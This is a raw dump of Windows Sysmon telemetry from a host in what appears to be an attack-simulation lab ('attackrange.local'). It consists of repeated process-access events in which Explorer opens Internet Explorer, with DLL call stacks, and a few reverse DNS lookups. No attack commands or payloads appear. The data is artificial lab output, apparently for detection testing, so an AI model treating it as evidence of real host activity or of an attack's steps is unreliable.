Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.224{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.613{59A5CD1D-8E56-6005-2E00-00000000A301}246458.168.223.173.in-addr.arpa.0type: 12 a173-223-168-58.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000013608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.613{59A5CD1D-8E56-6005-2E00-00000000A301}2464196.194.57.52.in-addr.arpa.0type: 12 ec2-52-57-194-196.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000013607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.611{59A5CD1D-8E56-6005-2E00-00000000A301}2464135.31.126.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.611{59A5CD1D-8E56-6005-2E00-00000000A301}246435.208.58.216.in-addr.arpa.0type: 12 fra15s12-in-f3.1e100.net;type: 12 fra15s12-in-f35.1e100.net;C:\Windows\sysmon64.exe 22542200x800000000000000013605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:09.611{59A5CD1D-8E56-6005-2E00-00000000A301}2464164.16.217.172.in-addr.arpa.0type: 12 fra15s11-in-f4.1e100.net;type: 12 fra15s11-in-f164.1e100.net;C:\Windows\sysmon64.exe 
10341000x800000000000000013632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:13.788{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
